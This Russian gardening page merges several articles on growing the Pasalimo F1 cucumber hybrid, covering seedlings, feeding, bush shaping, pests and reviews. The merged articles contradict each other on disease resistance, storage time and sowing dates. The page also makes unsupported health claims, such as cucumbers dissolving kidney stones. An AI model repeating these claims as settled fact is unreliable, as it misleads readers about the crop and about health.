12 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Пасалимо огурец описание выращивание уход фото

Чем хорош гибрид огурцов «Пасалимо f1» и почему его стоит попробовать вырастить

Огурец Пасалимо f1 – раннеспелый голландский гибрид, подходящий для выращивания на всей территории России. Культура отличается длительным периодом плодоношения, а при правильной формовке кустов гарантирует получение двойного урожая. Изумрудная плотная кожица с большим количеством бугорков и хрустящая мякоть без пустот позволяет использовать пикули и корнишоны для приготовления зимних заготовок.

Культура завоевала любовь фермеров благодаря высокой продуктивности при минимальных трудозатратах и финансовых вложениях. В этой статье мы расскажем о плюсах и минусах гибрида, особенностях агротехники, методах борьбы с обычной мозаикой огурцов и насекомыми.

Описание гибрида

Огурец Пасалимо f1 вывели биологи голландской компании Syngeta seeds. Гибрид включен в Госреестр РФ в 2005 году. Культура предназначена для выращивания в открытом и закрытом грунтах.

Характеризуется ранним сроком созревания, имеет женский тип цветения. Кусты – среднерослые, мощные, с неограниченным ростом главного стебля. Плоды – корнишонного типа. В одном узле формируется от 3 до 6 зеленцов.

На фото – огурцы Пасалимо.

Отличительные черты представлены в таблице:

Показатели Характеристика
Срок созревания 39-41 день
Тип опыления Партенокарпический
Масса 80-90 г
Длина 5-8 см
Форма Цилиндрическая
Окраска Темно-зеленая с короткими полосками, небольшой пятнистостью
Листья Среднего размера, светло-зеленого цвета
Мякоть Плотная, хрустящая, сочная
Вкус Освежающий, без горечи
Кожица Плотная, крупнобугорчатая, с белой опушкой
Назначение Универсальное
Урожайность 14 кг/м²
Устойчивость К оливковой пятнистости, мучнистой росе.
Транспортабельность Высокая

Химический состав, калорийность и польза

Калорийность огурцов составляет всего 14 ккал на 100 г.

Химический состав продукта:

  • витамины А, В1, В2, В4, В5, В6, В9, С, Е, Н, К, РР и бета-каротин;
  • минералы: калий, кальций, кремний, магний, натрий, фосфор, железо, йод, медь, селен, фтор, цинк.

Регулярное употребление огурцов оказывает положительное воздействие на организм:

  • нормализация водно-солевого баланса;
  • ускорение обмена веществ;
  • расширение сосудов;
  • нормализация кровяного давления;
  • расщепление холестериновых бляшек;
  • растворение камней и песка в почках;
  • нормализация работы поджелудочной железы;
  • улучшение показателей крови.

Агротехника гибрида

Огурцы Пасалимо f1 выращивают через прямой посев в грунт в первых числах мая, через рассаду – в начале апреля.

Агротехника огурцов – стандартная. Культура нуждается в правильном поливе в зависимости от погодных условий, рыхлении и прополке грунта, подкормке органикой и минералами, формовке кустов.

Посадка семенным способом

Огурцы любят тепло, поэтому прямой посев производят в начале мая. Температура грунта должна составлять +15-18°С, воздуха – стабильные +20°С днем и +15°С ночью.

Участок под посев выбирают с южной стороны. Осенью почву вскапывают, удобряют перегноем (10 л на 1 м²). Весной разрыхляют и подкармливают куриным пометом (10 л на 1 м²). В почву подмешивают древесные опилки и торф.

Семена заделывают в лунки на глубину 2-3 см, с промежутком 20 см. Расстояние между рядами – 70 см. Грядки поливают теплой водой и укрывают агроволокном для защиты от заморозков.

Выращивание рассады

Культура характеризуется ранним плодоношением, поэтому посев семян на рассаду проводят в конце апреля.

Рассадный метод существенно сокращает период созревания. В незащищенном грунте урожай собирают на 14 дней раньше огурцов, выращенных в теплице.

Семена гибрида не требуют предпосевной дезинфекции и обработки стимуляторами всхожести. Материал проходит предварительную обработку перед расфасовкой.

Основные этапы выращивания:

  1. Почвосмесь для выращивания рассады готовят из одной части речного песка, двух частей торфа и компоста. На ведро объемом 10 л добавляют 45 г нитрофоски и 30 г древесной золы. Смесь перемешивают, прогревают в духовом шкафу при температуре 110 °С, затем увлажняют, и раскладывают в торфяные емкости по 0,5 л.
  2. Семечки заделывают на глубину 2 см по 2 шт. Поливают теплой водой и натягивают сверху полиэтилен для создания парникового эффекта.
  3. После появления настоящих листочков пленку снимают, а рассаду выносят на солнечный подоконник. Ростки подпитывают раствором: 25 г нитрофоски на 3 л теплой чистой воды.
  4. Рассаду поливают раз в неделю.
  5. За неделю до посадки сеянцы выносят на свежий воздух для закалки и быстрой адаптации к новым условиям.
  6. Через 20-25 дней сеянцы высаживают на постоянное место. Лунки выкапывают по схеме 50х60 см. Рассаду высаживают в ямки глубиной 10 см.
  7. Почву покрывают сеном, соломой, опилками, хвоей для задержки влаги и сокращения частоты рыхлений и прополок.

Выращивание и уход

Огурцы предпочитают рыхлую и питательную почву с нейтральным pH = 7. Лучшие предшественники культуры – укроп, петрушка, бобовые, капуста, лук, чеснок.

Правила успешной агротехники:

  1. Рыхление грунта после полива и прополка сорняков.
  2. В засушливую погоду и во время активного плодоношения растения поливают строго под корень каждый день. В холодную и дождливую погоду полив на время прекращают – переохлаждение корней приводит к заражению бактериальными инфекциями.
  3. Культуру подкармливают органическими и минеральными подкормками, чередуя каждую из них. Всего вносят до пяти порций удобрений два раза в месяц.

Схема подкормки:

  • через 10 дней после посадки – 10 г мочевины, 10 г суперфосфата, 20 г гумата натрия на 10 л воды;
  • в период цветения и плодоношения – 25 г нитрофоски, 20 г куриного помета на 10 л воды;
  • последующие подкормки – 10 г сульфата калия, 500 мл коровьего навоза на 10 л.

Для улучшения состава почвы, ускорения роста растений, повышения иммунитета применяют дрожжевые удобрения: 500 г ржаного хлеба, 500 г ботвы или крапивы, 500 г прессованных дрожжей залить 10 л теплой воды и оставить на 48 часов. Средство наливают под корень.

Популярностью пользуются готовые гуминовые подкормки: «Кормилец», «Бутон», «Идеал», «Фертика Люкс», «Здравень», «Плодородие».

Особенности выращивания и возможные трудности

Чтобы добиться максимальной продуктивности гибрида Пасалимо f1, кусты подвергают формовке:

  1. Основную плеть прищипывают после 5-6 листа. Это стимулирует рост дополнительных побегов, на которых формируется основная масса плодов.
  2. Боковые побеги прищипывают над 2-3 листком.
  3. Цветки и боковые побеги до 6 листка удаляют.
  4. Нижние листья обрезают по мере роста куста для улучшения вентиляции.
  5. Побеги, которые отдали весь урожай, удаляют для стимуляции новых завязей.

При правильной формовке огуречные кусты плодоносят до наступления заморозков.

Пасалимо – индетерминантный гибрид с неограниченным ростом основного стебля, поэтому нуждается в подвязке к шпалере. Манипуляцию проводят после появления 5-6 листков.

Болезни и вредители

Культура имеет иммунитет к оливковой пятнистости и мучнистой росе, частично толерантна к вирусу обыкновенной мозаики.

Признаки этой болезни редко проявляются на стадии сеянцев.

Распознается заражение в период активного роста растения:

  • крапчатость на листьях;
  • деформация и скручивание листьев краями вниз;
  • задержка роста кустов;
  • желтые крапинки и бугры на плодах.

Главный переносчик вируса табачной мозаики – бахчевая тля.

Методы борьбы:

  • прополка с полным уничтожением сорняков;
  • уборка растительных остатков в межсезонье;
  • применение стерильного инструмента при работе с посадками огурцов;
  • обработка грунта медным купоросом (50 г вещества на 10 л воды);
  • борьба с тлей на участке;
  • обработка 3%-ным раствором препарата «Фармайод-3».
  • инсектициды «Танрек», «Данадим», «Децис», «Конфидор»;
  • биопрепараты «Битоксибациллин», «Актофит», «Фитоверм», «Энтобактерин».

Параллельно ведут борьбу с муравьями, ведь именно они заносят тлю на участок. Для отпугивания насекомых используют средство «Муравьед», заливают муравейники кипятком, проводят частое рыхление почвы.

Совет. Посейте рядом с огуречными посадками анис, душицу, бархатцы, маргаритки, тмин для привлечения божьих коровок – верных помощников в борьбе с бахчевой тлей.

Кроме тли, сочными листьями огурцов любят лакомиться паутинные клещи. В этом случае на помощь придут народные средства:

  1. 30 г измельченных сухих корней одуванчика залить 1 л воды и настоять три часа. Опрыскивать огурцы два раза в неделю.
  2. Корень борщевика, собранного перед цветением, залить 10 л воды. Через сутки обработать кусты.
  3. 100 г сухих листьев дурмана обыкновенного залить 1 л теплой воды. Через 12 часов процедить и обработать кусты.
  4. Заполнить ведро до половины сухими цветками бархатцев и залить теплой водой. Настоять 48 часов, процедить и растворить в настое 50 г стружки хозяйственного мыла. Обрабатывать кусты вечером в сухую погоду, один раз в неделю.

Огуречные посадки часто поражают слизни. Чтобы избавиться от вредителя, проводят ручной сбор в ночное время, орошают кусты раствором нашатыря (2 ст. л. на 1 л воды), посыпают грядки яичной скорлупой, табачной махоркой, хвойными иголками, жгучим перцем.

Сбор и применение урожая

Первый урожай снимают примерно через 40 дней после входов. Огурцы растут пучками, и чтобы аккуратно снять созревшие экземпляры, используют ножницы.

Зеленцы не склонны к перерастанию, но частый сбор урожая стимулирует рост следующих плодов.

Гибрид пригоден для сбора пикулей размером 3-5 см для маринования и засолки, корнишонов длиной 5-8 см. Плоды одинаково хороши в свежем и консервированном виде.

Огурцы отлично переносят транспортировку на дальние расстояния без потери товарного вида. В прохладном помещении хранятся до трех недель.

Преимущества и недостатки

Достоинства гибрида:

  • выравненность огурцов;
  • лежкость;
  • раннеспелость;
  • обильное плодоношение до заморозков;
  • неприхотливость в уходе;
  • универсальное применение в кулинарии;
  • устойчивость к оливковой пятнистости и мучнистой росе;
  • возможность собирать пикули и корнишоны;
  • отличный вкус;
  • отсутствие горечи;
  • плотная, хрустящая мякоть без пустот.

Недостаток – необходимость формовки кустов.

Отзывы

Голландский гибрид высоко ценится огородниками за высокую продуктивность при минимальных трудозатратах. Потребителям нравятся маленькие хрустящие огурцы, которые долго не теряют свежесть.

Эдуард, пос. Ржакса: «Огурцы Пасалимо высаживаю в теплицу через рассаду. Семена обладают отличной всхожестью и не нуждаются в дополнительных обработках. Кусты формирую в один стебель и получаю два урожая за сезон. Огурцы плотные, с жестковатой шкуркой, но вкусные и ароматные. Использую для засолки и мариную в уксусе».

Мария, г. Льгов: «Семена гибрида Пасалимо впервые приобрела в прошлом году. Высадила на пробу несколько кустов в даче в огороде. Культура любит воду и солнечный свет. При нехватке освещения плохо завязывает плоды. Для подкормки использую готовые гуминовые удобрения, делаю прополку и удаляю сорняки».

Заключение

Пасалимо – партенокарпический гибрид корнишонного типа. Короткие выровненные плоды подходят для сбора на стадии молочной спелости. Такие часто используют для приготовления пикантных маринованных закусок.

Агротехника культуры не представляет сложностей даже для начинающих огородников. Как и любой другой голландский гибрид, Пасалимо требует частого полива по время плодоношения, внесения минеральных и органических подкормок.

Растение устойчиво к оливковой пятнистости и мучнистой росе, но подвержено обычной мозаике огурцов. Справиться с заболеванием поможет удаление сорняков с участка, дезинфекция почвы, уничтожение тли.

Сорт огурцов Пасалимо F1

Относительно недавно на садоводческих рынках появился новый сорт – огурец Пасалимо F1. Культура была выведена в Нидерландах и удачно сочетает в себе многие положительные качества, которые огородники хотят видеть в овощах.

Сорт огурцов Пасалимо F1

Характеристика сорта

Огурцы Пасалимо относят к гибридным культурам, поэтому самостоятельно собрать семена нельзя. Каждый год необходимо приобретать новый посадочный материал.

Растение подходит для выращивания на открытых участках и в тепличных условиях. Рекомендуют использовать второй способ, тогда цветение будет обильным и постоянным, а урожайность высокой.

Сорт раносозревающий, самоопыляющийся, его плоды универсальны в применении. Их используют как в свежем виде, так и для зимних заготовок и консервации.

Небольшие размеры огурцов и их привлекательный внешний вид позволяет проводить сбор на стадии пикулей (2-6 см) и корнишонов (6-9 см).

Урожайность

Пасалимо относят к высокоурожайным сортам. На одной ветке растение способно сформировать 6-8 качественных плодов.

За сезон, при благоприятных условиях, можно собрать 15-17 кг/м². Огурцы созревают синхронно, дружно. Сбор плодов проводят ежедневно, чтобы не допустить их перезревание.

Описание растения

Кусты обладают следующими признаками:

  • среднерослые, основная ветка крепкая, хорошо развита;
  • тип цветения преимущественно женский;
  • листья светло-зеленого цвета, небольшого размера;
  • листовая пазуха формирует 6-7 плодоносящих завязей.

Описание плодов

Огурец Пасалимо цилиндрической формы, на кожуре явно заметны крупные бугорки. Размеры плодов приблизительно одинаковые, длина одного экземпляра достигает 7-10 см, при весе 70-100 г.

Мякоть овощей сочная, хрустящая, без признаков горечи. Ярко ощущается характерный для огурцов аромат.

Болезни и их профилактика

Согласно описанию, сорт огурцов Пасалимо устойчив к таким типичным для всей культуры заболеваниям, как оливковая пятнистость, огуречная мозаика и мучнистая роса.

В качестве профилактических мероприятий регулярно (1 раз в 7-10 дней) проводят их опрыскивание медово-молочным раствором. Также это помогает защитить культуру от вредных насекомых и дополнительно питает полезными микроэлементами.

Достоинства и недостатки

Гибридный сорт Пасалимо был получен в результате смешения более 10-ти сортов огурцов. От каждого из них растение взяло определенные положительные качества, среди которых выделяют:

  • культура устойчива к большинству заболеваний;
  • плоды созревают одновременно, поэтому урожай можно собрать в сжатые, короткие сроки;
  • овощи хорошо хранятся (4-5 мес.), легко переносят транспортировку, обладают высокими вкусовыми качествами;
  • несобранные вовремя плоды не желтеют, только приобретают крупные размеры и жесткую кожуру;
  • зеленцы обладают универсальным характером применения, имеют отличный товарный вид.

Существенных недостатков в описании разновидности нет. Единственный минус – невозможность самостоятельно собрать семена для посева культуры на следующий год.

Выращивание

Сорт отличается урожайностью

Компактные размеры куста позволяют выращивать огурцы на небольших участках. Независимо от того, где выращивается растение – в теплице или открытом грунте, молодые саженцы первое время необходимо держать под пленочным укрытием. Это позволит им быстрей окрепнуть, повысит иммунитет и устойчивость культуры к возможным неблагоприятным погодным условиям.

Вегетационный период короткий: с момента появления первых всходов до первого урожая проходит 35-40 дней. Плодоношение происходит волнообразно и продолжается до наступления холодов. Плоды созревают дружно.

Рассадный метод выращивания

Для получения более раннего урожая выращивают культуру рассадным способом. Предварительной обработки посевной материал не требует, производители реализуют его уже продезинфицированным и витаминизированным.

Для ускорения прорастания проводят проращивание: помещают в увлажненную ткань на 1-3 дня. Регулярно ее опрыскивают теплой водой, не допуская подсыхания.

Семена огурцов Пасалимо на рассаду сеют в начале апреля, пересадку на постоянное место в этом случае необходимо будет осуществлять в середине мая. Посев в общий контейнер предусматривает последующее их пасынкование по отдельным емкостям (на стадии развитых 2-х настоящих листков).

Семена помещают в плодородную, обогащенную полезными веществами и умеренно увлажненную почву на глубину 1-1,5 см. Ящики прикрывают полиэтиленовой пленкой или стеклом и ставят в теплое место до появления первых всходов.

После этого полиэтилен снимают, а емкость переносят на солнечное место для дальнейшего роста и развития рассады.

При пересадке растений на постоянное место придерживаются следующей схемы: между растениями оставляют 30-40 см, между рядами – 70-80 см. Тепличное выращивание позволяет осуществлять более густую посадку.

Уход заключается в регулярном проведение таких агротехнических мероприятий, как полив, прополка, рыхление почвы, осуществление профилактических мер по предупреждению заболеваний растения.

Полив проводят регулярно, но умеренно, не допуская переувлажнения почвы. Рекомендуют использовать слегка подогретую, отстоянную или дождевую воду. Преимущество отдают капельному методу полива, когда вода планомерно подается под корень в небольших количествах. Увлажнять почву нужно в вечернее время, после сбора урожая.

Послеэтого между кустами рыхлят почву, а также осуществляют прополку участка от сорняковой травы. Это позволит сохранить в грунте максимальное количество питательных веществ и влагу, а также улучшит доступ свежего воздуха к корневой системе.

Периодически, 4-5 раз за сезон, проводят подкормки. Для этого используют минеральные, органические и комплексные удобрения, чередуя их между собой. В период формирования завязей рекомендуют применять калийно-фосфорные подкормки.

Безрассадный метод посадки

Можно провести посев семян непосредственно в грунт.

Плодоношение в этом случае будет существенно ниже и позже, чем при рассадном методе выращивания.

Помещать семена в открытую почву необходимо, когда грунт хорошо прогреется, а также исчезнет риск резкого перепада температуры. Сроки для каждого региона определяются индивидуально (начало–конец мая).

После посева грядку необходимо укрыть пленкой. Это обезопасит огурцы от возможного промерзания, создаст парниковый эффект, который будет способствовать более активному прорастанию семян.

Сорт Пасалимо чувствителен к изменениям погоды, поэтому важно следить за температурным режимом в период формирования растения. При резком ухудшении погодных условий, лучше укрыть участок с огурцами пленкой.

Схема посадки аналогична рассадному способу выращивания.

Огурец Пасалимо: описание сорта, фото, отзывы

Лидером отечественных огородов по праву считается огурец. Отсутствие этого демократичного продукта на грядках и столах представить невозможно. Видимо, поэтому селекционеры не оставляют работу по созданию новых сортов и гибридов. И изыскания эти весьма успешны.

Пасалимо, огурцы: описание сорта

Позиционируемый селекционно-семеноводческой голландской фирмой Syngenta Seeds B. V. этот огурец включен в госреестр РФ в 2005 году и уже более 12 лет культивируется на дачных участках и в фермерских хозяйствах. Гибрид допущен к возделыванию во всех регионах страны и одинаково успешно растет на открытых грядах и в тепличных условиях. Универсальность сорта объясняется его свойствами партенокарпика, т. е. классического опыления пчелами он не требует.

Огурец Пасалимо – гибрид с удивительно малым периодом вегетации, рамки которого ограничиваются всего 39-41-м днем, зато плодоношение его продолжается до самых холодов. Корнишонный тип овоща дает возможность собирать плоды разной степени спелости и размеров:

• пикулей — в 3-5 см;

• корнишонов — в 5-8 см.

Культура женского типа, не имеющая пустоцветов, среднерослая, индетерминантная, т. е. с неограниченно растущим центральным побегом.

Огурец Пасалимо покрыт кожицей яркого изумрудного цвета с чуть выраженной пятнистостью и нечеткими светлыми черточками. Гибрид обладает превосходной хрустящей мякотью, лишенной неприятной горечи.

Урожайность и устойчивость к заболеваниям

Сорт замечателен весьма высоким процентом выхода качественной товарной продукции, который составляет почти 96 % по выращенным овощам в теплице и чуть меньший показатель по урожаю с открытых грядок. С 1-го квадратного метра обычно снимают 13-15 кг огурцов. После сбора урожая плоды достаточно долго сохраняют свои товарные качества. Даже не снятые вовремя зеленцы не перерастают. Огурец Пасалимо, фото которого представлено в статье, универсален. Он употребляется в свежем виде, великолепен в маринадах, соленьях, закусках, так как плотная структура мякоти гибрида препятствует образованию пустот при тепловой обработке.

Достоинством гибрида является и высокая устойчивость к таким огуречным напастям, как мучнистая роса, кладоспориоз, вирус огуречной мозаики, способным погубить львиную долю урожая.

Итак, достоинствами сорта являются высокие вкусовые свойства, одномерность плодов, хорошая урожайность, устойчивость к типичным болезням, транспортабельность и товарность.

Огурец Пасалимо: особенности посадки

Наиболее высокие урожаи гибрид дает на плодородных, дренированных суглинистых почвах. Как и все огурцы, Пасалимо (отзывы овощеводов подтверждают) неравнодушны к обилию света и тепла. Поэтому, выбирая участки для посадки, руководствуются именно этими критериями. Лучшими предшественниками считаются пасленовые, лук, бобовые и крестоцветные.

Выращивают гибрид рассадой или семенами, которые сеют сразу в теплицу. Почва к времени посева должна быть прогрета до 15-18 °С, поскольку огурец – растение теплолюбивое. Поэтому примерными сроками высадки Пасалимо в средних и умеренных широтах страны считают период с 15 по 25 мая, хотя ориентироваться приходится на погоду, установившуюся в регионе. Оптимальные дневные температуры, необходимые растению для качественного развития, не должны быть ниже 22-24 ˚С, ночные – 18 ˚С.

Уход за рассадой

Сорт огурцов Пасалимо дает рослые, но хрупкие всходы. Поэтому знающие овощеводы рекомендую высевать их на рассаду сразу в отдельные емкости. Это значительно улучшит состояние сеянцев, не задержит их в росте, укрепит стебель и в краткие сроки разовьет сильную корневую систему.

Рассаде необходим хороший уход, заключающийся в достаточном освещении и поддерживании температуры воздуха на уровне 20-25 °С. Поливают проросшие сеянцы весьма умеренно, избегая излишнего увлажнения. Оно может вызвать бактериальные инфекции. Важно помнить, что рассадный период для огурца довольно ограничен и не превышает 25-30 дней. Переросшие сеянцы тяжело и долго приживаются.

Подготовка почвы

Опытные огородники рекомендуют высаживать огурцы в высокие грядки с небольшим уклоном к югу, они значительно быстрее прогреваются на солнце и хорошо держат тепло. Огурцам требуются почвы с низким содержанием азота. Кислые грунты необходимо известковать.

Готовить место под посадку начинают с осени. Под перекопку вносят 10 кг свежего навоза либо 60-70 г фосфорно-калийных соединений на 1 кв. метр. Весной участок еще раз тщательно разрыхляют.

Подготовка теплицы и посадка

Перед посадкой в теплицу нужно учесть некоторые особенности закрытого выращивания, поскольку без соответствующей обработки трудно избежать инфекционного поражения, несмотря на хороший иммунитет гибрида Пасалимо.

Уход за культурой

Пасалимо относят к сортам со средним образованием боковых побегов, контролировать появление которых следует обязательно, чтобы растение не наращивало зеленую массу в ущерб плодообразованию. После 6-8-го листа верхушку центрального стебля прищипывают, провоцируя ветвление. Для плодоношения оставляют 1-2 крепких стебля, другие боковые пазушные побеги обрезают. За огуречными посадками тщательно следят, содержат их в чистоте, периодически поверхностно и аккуратно рыхля и удаляя сорняки. Поливают исключительно теплой водой, которую подают под корень, избегая увлажнения растения целиком.

Тепличное возделывание огурца предполагает использование вертикальных опор, позволяющих увеличить количество растений и получать высокие урожаи здоровых плодов, не соприкасающихся с почвой.

Подкормки огурцов

Растения подкармливают 3-4 раза за сезон. Через неделю после высадки рассады в грунт сеянцы удобряют раствором карбамида, сульфата калия и суперфосфата (по 15 г каждого препарата на 10 л воды). В дальнейшем подкормки осуществляют каждые 2 недели, давая растениям по 1-1,5 литра настоя навоза (1 л/10 л воды) или перепревшей зеленой массы.

Итак, мы перечислили основные агротехнические приемы выращивания огурца Пасалимо – перспективной и высокоурожайной культуры.

Описание огурцов сорта Пасалимо

Огурцы сорта Пасалимо – это ранний гибридный вид, который относительно недавно появился на рынке Российской Федерации. Впервые сорт был выведен селекционером из Нидерландов. Он пытался создать оптимальный сорт для того, чтобы его можно было выращивать и в домашних условиях, и в теплицах, и, конечно, в открытом грунте, и чтобы постоянно сохранялся процент плодоношения.

Описание огурцов сорта Пасалимо

Характеристика сорта

Сорт огурцов Пасалимо – это гибридный вид, который размножается пучкованием, то есть на одной основной ветке сразу может появиться более 8 плодов, они через некоторое время смогут созреть, причем, синхронно.

Пасалимо – это довольно урожайный сорт, который за период цветения может дать свыше 15 кг. Сорт довольно светолюбивый, поэтому, когда будете выбирать место для посадки, то выбирайте большой участок, который большую часть времени находится под солнцем. Благодаря своему раннему созреванию у сорта хороший процент урожайности, кроме того, он самоопыляющийся.

Большая часть специалистов рекомендует производить выращивание такого сорта в теплых условиях, чтобы цветение было синхронным и постоянным. Пасалимо подходит как для свежего использования, так и для заготовки консервации, также отлично подойдет для свежих салатов. Такой сорт идеально подойдет для того, чтобы собирать пикули и корнишоны 2- 6 и 6-9 см соответственно.

Описание растения

В большей части в растении доминируют женские типы цветения, все кусты среднерослые и имеют большой потенциал для роста главной ветки.

Листья у растений светлые, маленького размера. Одна листовая пазуха может формировать более 6 завязей, которые потом будут созревать одинаково. Главное – вовремя их обработать и посадить в ранее время года, но после первых морозов.

Описание плода

Все огурцы имеют цилиндрическую форму, все они одного размера с крупными бугорками на кожице. В среднем, длина одного плода может достигать 7-10 см, а вес плодов может быть минимальный 70 и максимальный 100 г.

На кожице есть небольшие короткие белые пятна и полоски, которые не всегда видны. Шипы белые с легко опушенным уплотнением. Опытные садоводы говорят, что мякоть довольно хрустящая без каких- либо признаков горечи.

С 1 м2 можно получить более 12-15 кг., выход продукции после уборки составляет – 97 %. Как уже говорилось раньше, огурцы универсальные и подходят для любого применения.

Преимущества и недостатки

На самом деле, благодаря своей гибридности и смешению различных сортов огурцов (более 10) у сорта много положительных сторон. Плюсы сорта:

  • устойчивость ко многим заболеваниям и вредителям;
  • если вовремя не соберете плоды, то можете не переживать, они не пропадут и не пожелтеют;
  • могут долгое время храниться;
  • нормально переносят транспортировку;
  • отменные вкусовые качества;
  • универсальность использования;
  • сорт быстро спеет;
  • отличный товарный вид;
  • при правильном хранении может пролежать более 4 -5 месяцев.

Выращивание

Сорт порадует вас ранним урожаем

Такой сорт отлично подойдет для огородных участков, небольших фермерских хозяйств и садов приусадебного типа. Для того, чтобы культивировать растение, его нужно посадить в открытой почве и постоянно держать под пленочным укрытием, неважно, где будет прорастать: в теплице, парнике или домашних условиях.

Описание огурца Пасалимо f1 и отзывы о нем приятно удивят. Садоводы нахваливают этот вид за его уникальные характеристики. С самого начала посадки и со сбора плодов проходит короткий период: в среднем, он составляет 40 дней. Период плодоношения – до самых холодов, как только вы соберете одни плоды, через время вырастут другие.

Посадка в открытом грунте

Чаще всего, такой сорт сажают под пленочным укрытием в теплицах и парниках, тогда с плодами будет намного меньше проблем.

Посадка может быть, как сухими семенами, так и способом рассадки. Именно последний способ лучше всего подходит, в том случае, если вы хотите получить отличный процент урожайности.

Когда будете выращивать рассаду, внимательно смотрите за температурным режимом, так как он очень важен для этого сорта. Почва для посадки должна быть теплой и прогретой, также важен показатель температуры воздуха.

Самая оптимальная температура считается 23-28 градусов по Цельсию. Поэтому, если вы будете соблюдать все рекомендации, то уже через 23 дня вы сможете получить готовую рассаду.

Когда сеять семена

Для того, чтобы получить рассаду семян, можно начать весь процесс в апреле, сажать в почву лучше всего в начале мая. Схема высадки растения стандартная, главное увлажнить почву и сделать ямку 45 см на 60 см и глубину 2-3 см.

Также необходимо ухаживать за грядками, постоянно их пропалывать, убирать все сорняки, не забывать подкармливать органическими и минеральными добавками по очереди. В общем, за весь сезон необходимо провести, как минимум, 5 подкормок.

Не забывайте убирать сухие и больные листья вместе с плодами для того, чтобы не происходило никакого заражения. И, конечно, постоянный полив растений, особенно, когда будет период плодоношения. Поливайте в вечернее время после того, как соберете огурцы.

Заболевания и профилактика

Паласимо устойчив ко многим заболеваниям, такие, как огуречная мозаика, мучнистость росы, пятнистость только оливкового типа. Для того чтобы плоды совсем не болели раз в неделю обрызгивайте их раствором молока и меда, это защитить от вредителей, а также даст дополнительные витамины и минерала.

Огурец Пасалимо

Огурцы корнишоны голландской селекции всегда остаются фаворитами на грядке. Они хороши в засолке и свежем виде, а урожайность огурцов таких сортов на высшем уровне. Описание и отзывы об огурце Пасалимо F1 только подтверждают это.

Описание огурцов Пасалимо F1

Впервые в России об этих огурцах услышали в 2005 г., когда они попали в Госреестр. Огурцы сорта Пасалимо выращивают повсеместно, их культивируют в теплицах и открытом грунте. Гибрид подходит для малого частного хозяйства и промышленного выращивания. Оригинатор сорта – фирма “Syngenta” Seeds B. V.

Огурец Пасалимо – партенокарпический гибрид, чем объясняется его универсальность. Растения сорта не требуют опыления насекомыми. В плодоношение вступают рано, уже спустя 38-42 дня можно снимать первый урожай. Новая завязь образуется до самых заморозков.

Кусты среднерослые, центральный побег в росте неограничен. Листья светло-зеленые, опушенные, небольшие. Тип завязи пучковой. В одной пазухе образуется до 6 плодов.

Плоды сорта Пасалимо корнишонного типа, бугорчатые, одномерные. Средний вес достигает 80 г. Зрелый плод снимают, когда его длина достигает 5-8 см. Кожица огурцов плотная, темно-зеленого цвета, опушенная, по всей поверхности размытые белые полосы. Чтобы вырастить огурцы Пасалимо, как на фото ниже, нужно придерживаться рекомендаций из описания сорта.

Вкусовые качества огурцов

Мякоть огурца Пасалимо на генном уровне лишена горечи, плотная, хрустящая.

Огурцы сорта подходят для свежего потребления и маринации. Корнишоны Пасалимо хорошо сохраняют свои вкусовые качества в банках.

Плюсы и минусы сорта

Огурцы Пасалимо долго сохраняют товарный вид, хорошо переносят транспортировку. Не перерастают, если их оставить на кустах и не собрать вовремя. Но это далеко не все положительные качества гибрида, у голландских огурцов есть много достоинств:

  • большой выход товарной продукции;
  • высокая урожайность;
  • универсальность выращивания;
  • отличный иммунитет растения;
  • небольшой размер плодов;
  • отменные вкусовые качества;
  • товарный вид.

Недостатков у гибрида Пасалимо за все время выращивания не замечено.

Оптимальные условия выращивания

Не стоит сажать культуру на сквозняке или в закисленную почву. Лучшее место для голландского гибрида – теплый солнечный участок, хорошо защищенный от холодных ветров. Почва при этом на грядке должна быть плодородной на глубину до 30 см. Под перекопку можно внести перегной, торф, перепревшие опилки, минеральные комплексы и золу.

Хорошие предшественники огурцов Пасалимо на грядке:

А вот после тыквенных культур высаживать гибрид не стоит. У растений общие болезни и вредители, поэтому избежать их будет сложно.

Выращивание огурцов Пасалимо

Огурец Пасалимо можно выращивать рассадным способом или посевом прямо в грунт. Второй способ больше подходит для регионов с теплым климатом, где весна мягкая, а заморозки наступают поздно.

Прямая посадка в открытый грунт

Поскольку огурцы – теплолюбивая культура, сажать семена на грядку нужно не ранее мая, когда почва прогреется до температуры +15… +18°С. При этом температура окружающей среды днем должна быть на уровне +20… +22°С, а ночью – не ниже +15°С.

Исходя из особенностей огурца Пасалимо, расстояние между семечками делают 15-20 см. В дальнейшем всходы прореживают, оставляя самые сильные. Расстояние между растениями в ряду должно составлять 45-50 см. Междурядья формируют широкие – около 70 см.

Выращивают огурцы Пасалимо вертикальным способом. По мере роста плеть направляют и закручивают вокруг шпалеры.

Выращивание рассадным способом

Сорт огурцов Пасалимо рано вступает в плодоношение, поэтому на рассаду его сеют в конце апреля или начале мая. Все зависит от региона выращивания.

Предварительную подготовку семян можно пропустить, так как оригинатор утверждает, что все необходимые процедуры проведены заранее. Для выращивания рассады выбирают контейнеры объемом 500 мл. Грунт обязательно должен быть рыхлым и питательным, чтобы семечки получили максимум полезных веществ.

После посадки огурцов Пасалимо емкости накрывают пленкой и убирают в теплое место. Почву регулярно поливают, чтобы она не пересыхала. Первые всходы появятся через 3-5 дней. После чего пленку снимают и продолжают выращивать рассаду.

Через 14 дней делают первую подкормку минеральными удобрениями. Как только появятся настоящие листья, рассаду нужно приучать к окружающей среде – ее ненадолго выносят на улицу. За несколько дней до пересадки огурцы должны провести на воздухе всю ночь.

Полив и подкормка

На постоянном месте за огурцами Пасалимо нужно правильно ухаживать, чтобы добиться хорошего урожая. Опытные огородники советуют следить за влажностью грунта и своевременно подкармливать растения минеральными и органическими растворами.

Поливать почву на грядках нужно часто, чтобы земля была увлажненной постоянно. В период засухи кусты мульчируют перегноем, чтобы сохранить влажность грунта, иначе завязь опадет, а новая не будет появляться.

Подкармливают огурцы Пасалимо на протяжении всего сезона каждые 10 дней. Минеральные подкормки чередуют с органикой. Используют удобрения с гуматами, золу, отвар зеленых трав, крапивы, дрожжевые настои.

Формирование

Чтобы урожай был максимальным, кусты огурцов сорта Пасалимо нужно правильно сформировать. После появления 5-6-го листа основную плеть прищипывают, чтобы стимулировать рост боковых побегов. Именно на них в дальнейшем будет формироваться основной урожай.

Кроме того, до 6-го листа все цветки и боковые побеги нужно удалить. По мере роста куста нижние листья также обрезают, чтобы растения хорошо проветривались. Отплодоносившие побеги вырезают, чтобы стимулировать рост новых завязей. Если куст правильно сформировать, то плодоносить он будет до самых заморозков.

Защита от болезней и вредителей

